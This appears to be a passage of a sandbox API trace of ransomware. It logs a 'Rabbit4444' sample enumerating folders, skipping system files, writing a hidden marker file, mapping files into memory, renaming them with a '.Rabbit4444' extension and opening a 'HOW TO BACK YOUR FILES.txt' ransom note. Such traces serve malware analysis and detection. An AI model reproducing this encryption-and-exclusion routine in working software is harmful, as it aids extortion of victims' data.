[0070.725] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093" [0070.725] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093\\" [0070.725] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093\\.BFC0E91B00AE8A0620D3" [0070.725] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\310093\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0070.754] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.757] FlushFileBuffers (hFile=0x27c) returned 1 [0070.757] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.758] CloseHandle (hObject=0x27c) returned 1 [0070.758] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093") returned 142 [0070.758] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.758] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fdaae, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x19944238, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf37ea6b3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0070.758] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.758] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.758] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.758] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.758] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fdaae, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x19944238, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf37ea6b3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.758] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.758] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.759] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.759] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.759] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.759] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf37ea6b3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf37ea6b3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf37ea6b3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.759] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.759] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.759] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ee4d5d, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x3f0afb6, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x3f0afb6, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x18ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504725120", cAlternateFileName="150472~1")) returned 1 [0070.759] lstrcmpiW (lpString1="1504725120", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.759] lstrcmpiW (lpString1="1504725120", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.759] lstrcmpiW (lpString1="1504725120", lpString2="Rabbit4444.exe") returned -1 [0070.759] lstrcmpiW (lpString1="1504725120", lpString2=".") returned 1 [0070.759] lstrcmpiW (lpString1="1504725120", lpString2="..") returned 1 [0070.759] lstrcmpiW (lpString1="1504725120", lpString2="windows") returned -1 [0070.759] lstrcmpiW (lpString1="1504725120", lpString2="bootmgr") returned -1 [0070.759] lstrcmpiW (lpString1="1504725120", lpString2="pagefile.sys") returned -1 [0070.759] lstrcmpiW (lpString1="1504725120", lpString2="boot") returned -1 [0070.759] lstrcmpiW (lpString1="1504725120", lpString2="ids.txt") returned -1 [0070.759] lstrcmpiW (lpString1="1504725120", lpString2="NTUSER.DAT") returned -1 [0070.759] lstrcpyW (in: lpString1=0x130ec56, lpString2="1504725120" | out: lpString1="1504725120") returned="1504725120" [0070.759] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093\\1504725120", dwFileAttributes=0x0) returned 1 [0070.759] lstrlenW (lpString="1504725120") returned 10 [0070.759] lstrlenW (lpString="Rabbit4444") returned 10 [0070.759] lstrcmpiW (lpString1="1504725120", lpString2="Rabbit4444") returned -1 [0070.760] lstrlenW (lpString=".dll") returned 4 [0070.760] lstrcmpiW (lpString1="5120", lpString2=".dll") returned 1 [0070.760] lstrlenW (lpString=".lnk") returned 4 [0070.767] lstrcmpiW (lpString1="5120", lpString2=".lnk") returned 1 [0070.767] lstrlenW (lpString=".ini") returned 4 [0070.767] lstrcmpiW (lpString1="5120", lpString2=".ini") returned 1 [0070.767] lstrlenW (lpString=".sys") returned 4 [0070.767] lstrcmpiW (lpString1="5120", lpString2=".sys") returned 1 [0070.767] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093\\1504725120" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\310093\\1504725120"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.768] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.768] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16207870993) returned 1 [0070.768] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=6350) returned 1 [0070.768] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0070.768] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0070.768] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1bd0, lpName=0x0) returned 0x2d0 [0070.769] MapViewOfFile (hFileMappingObject=0x2d0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1bd0) returned 0x70000 [0070.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x128478 [0070.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0070.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x128478 | out: hHeap=0xe0000) returned 1 [0070.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0070.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x128478 [0070.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0070.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x128478 | out: hHeap=0xe0000) returned 1 [0070.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0070.774] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16208501383) returned 1 [0070.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0070.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0070.774] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.775] CloseHandle (hObject=0x2d0) returned 1 [0070.775] CloseHandle (hObject=0x29c) returned 1 [0070.775] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093\\1504725120.Rabbit4444") returned 164 [0070.775] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093\\1504725120" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\310093\\1504725120"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093\\1504725120.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\310093\\1504725120.rabbit4444"), dwFlags=0x1) returned 1 [0070.776] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x323cdb, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xe75647c, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xb97e2cd3, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0070.776] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.776] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.776] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.776] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0070.776] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0070.776] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0070.776] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0070.776] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.776] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0070.776] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0070.776] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.776] lstrcpyW (in: lpString1=0x130ec56, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0070.776] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.776] lstrlenW (lpString="eventbeacons.dat") returned 16 [0070.776] lstrlenW (lpString="Rabbit4444") returned 10 [0070.776] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.776] lstrlenW (lpString=".dll") returned 4 [0070.776] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.776] lstrlenW (lpString=".lnk") returned 4 [0070.776] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.776] lstrlenW (lpString=".ini") returned 4 [0070.777] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.777] lstrlenW (lpString=".sys") returned 4 [0070.777] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.777] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x323cdb, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xfbc06fd, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xb97e2cd3, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0070.777] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.777] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.777] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.777] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0070.777] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0070.777] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0070.777] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0070.777] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.777] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0070.777] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0070.777] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.777] lstrcpyW (in: lpString1=0x130ec56, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0070.777] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.777] lstrlenW (lpString="imprbeacons.dat") returned 15 [0070.777] lstrlenW (lpString="Rabbit4444") returned 10 [0070.777] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.777] lstrlenW (lpString=".dll") returned 4 [0070.777] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.777] lstrlenW (lpString=".lnk") returned 4 [0070.777] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.777] lstrlenW (lpString=".ini") returned 4 [0070.777] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.778] lstrlenW (lpString=".sys") returned 4 [0070.778] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.778] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x323cdb, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xfbc06fd, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xb97e2cd3, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0070.778] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0070.778] lstrcpyW (in: lpString1=0x130ec56, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.778] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\310093\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0070.779] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.779] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.780] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.780] CloseHandle (hObject=0x29c) returned 1 [0070.780] CloseHandle (hObject=0x27c) returned 1 [0070.780] GetCurrentThreadId () returned 0xd98 [0070.780] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0070.780] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091" [0070.780] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1050b0 | out: hHeap=0xe0000) returned 1 [0070.780] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0070.780] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091" [0070.781] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091\\" [0070.781] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091\\.BFC0E91B00AE8A0620D3" [0070.781] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\310091\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0070.783] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.786] FlushFileBuffers (hFile=0x27c) returned 1 [0070.786] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.787] CloseHandle (hObject=0x27c) returned 1 [0070.787] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091") returned 142 [0070.787] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.787] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310091\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48361179, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x49247e6e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf38371bb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0070.787] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.787] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.787] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.787] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.787] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48361179, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x49247e6e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf38371bb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.787] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.787] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.787] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.787] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.787] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.787] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf38371bb, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf38371bb, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf38371bb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.787] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.787] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.787] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49247e6e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x49247e6e, ftLastAccessTime.dwHighDateTime=0x1d32744, 